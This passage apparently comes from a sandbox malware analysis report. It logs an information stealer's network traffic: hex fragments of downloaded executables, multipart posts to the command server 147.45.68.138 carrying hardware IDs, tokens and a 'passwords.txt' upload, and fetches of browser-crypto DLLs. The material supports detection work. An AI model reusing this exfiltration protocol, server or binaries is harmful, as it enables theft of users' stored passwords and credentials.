00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:28 GMTContent-Type: application/octet-streamContent-Length: 2046288Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-1f3950"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:35 GMTContent-Type: application/octet-streamContent-Length: 328744Last-Modified: Thu, 29 Aug 2024 19:35:43 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d0cd8f-50428"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 19 cd d0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d2 04 00 00 0a 00 00 00 00 00 00 ae f1 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 fe 11 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 f1 04 00 53 00 00 00 00 00 05 00 2e 06 00 00 00 00 00 00 00 00 00 00 00 de 04 00 28 26 00 00 00 20 05 00 0c 00 00 00 20 f0 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 d1 04 00 00 20 00 00 00 d2 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2e 06 00 00 00 00 05 00 00 08 00 00 00 d4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 05 00 00 02 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 f1 04 00 00 00 00 00 48 00 00 00 02 00 05 00 78 df 04 00 a8 10 00 00 03 00 02 00 0e 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 53 8a 02 61 81 e9 db 99 1d 0e 63 3f cc 36 14 88 55 d0 9b 43 4d 66 27 08 3c a8 73 14 6f 6f 98 a0 3c 43 da b5 71 92 77 4e bc 65 c8 ce 69 ed ef 13 65 34 2b 84 99 cd d1 9d 8e 01 83 ff ce 16 1f 52 c6 9c dd 31 62 72 85 b0 bb 49 55 55 3c 12 4e 02 ea 19 7c 63 b1 56 47 48 ed ee e1 24 89 26 7e ac 2b a5 e4 c7 83 90 3c 33 38 f5 a4 b3 7f 74 52 5d 42 8c 7a de 34 2d 6f 43 ed 7b a7 82 18 ee e0 1b 7b 39 96 ad e7 78 30 77 ea 95 49 37 ca 5f a9 3b 21 27 71 ac d8 55 8b a8 ca 3f 82 60 bb ee 2f de 2b 2c 50 cf 82 4d 8f e5 bc 09 8c f1 1b 38 94 b6 7d fb 33 6a ca 9c 24 ce 59 3d 32 c8 dd a7 a7 29 b1 57 d1 5d 0f 74 2a 5a f1 bc 3e d2 ff 67 32 01 69 2d cf ba b6 0c f2 e1 87 49 0b eb 95 5b eb 8d 77 0b 05 1c b9 9d 75 c3 e1 d5 03 c9 c5 07 c9 fa ce 68 a4 8e 61 c5 33 d0 51 2a c4 ec 0c 98 79 d5 05 b1 c8 e9 e9 0e 3d 63 32 b0 84 6e ab 08 ef a4 99 05 8b c8 51 d5 4a 3e f8 aa 03 3d ce 8d 66 bd 18 77 1b e3 45 2d 60 fa 80 01 ce 2f aa 06 f
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:37 GMTContent-Type: application/octet-streamContent-Length: 196648Last-Modified: Thu, 29 Aug 2024 19:35:54 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d0cd9a-30028"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ee cc d0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 ce 02 00 00 0a 00 00 00 00 00 00 ae ed 02 00 00 20 00 00 00 00 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 4e 2c 03 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 ed 02 00 53 00 00 00 00 00 03 00 2e 06 00 00 00 00 00 00 00 00 00 00 00 da 02 00 28 26 00 00 00 20 03 00 0c 00 00 00 20 ec 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 cd 02 00 00 20 00 00 00 ce 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2e 06 00 00 00 00 03 00 00 08 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 d8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 ed 02 00 00 00 00 00 48 00 00 00 02 00 05 00 78 db 02 00 a8 10 00 00 03 00 02 00 0e 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 26 28 81 2c 58 16 1e 55 f4 66 8b 68 95 e3 26 5c f4 fa 06 3d 45 e8 fc c8 d8 f7 25 22 3d 6d 3f 2a 3c 16 1c bf 55 1d a6 48 66 c2 74 24 96 d1 9a c9 12 c7 13 55 21 ba 42 8b 23 9b 95 3a c7 10 64 b8 fc 45 91 96 0c 5c 17 8e 4a 31 be dc 39 09 0f ae e7 c1 19 df 4b e2 6c 58 d8 47 52 41 8a ec 36 7c 5e 8c 2e d7 6f 91 82 d0 a8 eb 40 c7 90 26 cb a6 ca 35 12 ce 94 8b 09 bd 0b cd c3 3a 95 e4 f9 01 69 20 bf 58 6d 9e 95 58 6a a6 97 ff 0d 5f 30 22 4c 8a 58 8f 45 4f 20 6a 05 83 25 af d4 b0 6d 6e 9a 45 63 54 25 d6 33 43 c8 29 29 cd fa 5e 06 3a a9 54 6e 37 c3 77 c9 0b 59 df c9 2e a7 60 5b 41 ca 74 79 e1 ba e9 0f 4e b5 a5 ed c7 bf 6a a3 18 b8 73 c2 7c 51 54 3f 86 39 c7 e7 27 fe 3a e4 9e 6c 93 24 c9 7b 26 56 dc e0 7d ad 39 98 03 6e 65 73 af c4 85 5b e7 d5 f2 3f fd 77 71 52 2f 5f 4a 55 81 38 bf 69 72 5f 52 a7 18 12 68 da f2 79 3c b3 3c 09 b9 40 2f 08 fa d3 cf ec 02 27 10 c0 e8 2d 55 a9 18 76 38 d5 46 b3 32 7a 11 c3 5

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAECAECFCAAEBFHIEHDHost: 147.45.68.138Content-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 35 37 31 39 37 39 41 44 45 32 33 39 32 34 36 39 36 33 33 30 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 2d 2d 0d 0a Data Ascii: ------GDAECAECFCAAEBFHIEHDContent-Disposition: form-data; name="hwid"C4571979ADE23924696330-a33c7340-61ca------GDAECAECFCAAEBFHIEHDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------GDAECAECFCAAEBFHIEHD--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKJDAKEHJDGDGDGHIDHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 2d 2d 0d 0a Data Ascii: ------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="mode"1------GHJKJDAKEHJDGDGDGHID--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIEBAAKJDHIECAAFHCAHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 2d 2d 0d 0a Data Ascii: ------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="mode"2------DHIEBAAKJDHIECAAFHCA--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAKKKKJDBKKFIEBKEHDHost: 147.45.68.138Content-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 2d 2d 0d 0a Data Ascii: ------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="mode"21------ECAKKKKJDBKKFIEBKEHD--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHJEBGIEBFIJKEBFBFHHost: 147.45.68.138Content-Length: 6325Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sql.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJEHost: 147.45.68.138Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKKJEHDBGIDHJKJDBFHost: 147.45.68.138Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJJKKJJDAAAAAKFHJJHost: 147.45.68.138Content-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 2d 2d 0d 0a Data Ascii: ------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="file_data"------BGIJJKKJJDAAAAAKFHJJ--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKJDAKEHJDGDGDGHIDHost: 147.45.68.138Content-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 2d 2d 0d 0a Data Ascii: ------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="file_data"------GHJKJDAKEHJDGDGDGHID--
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
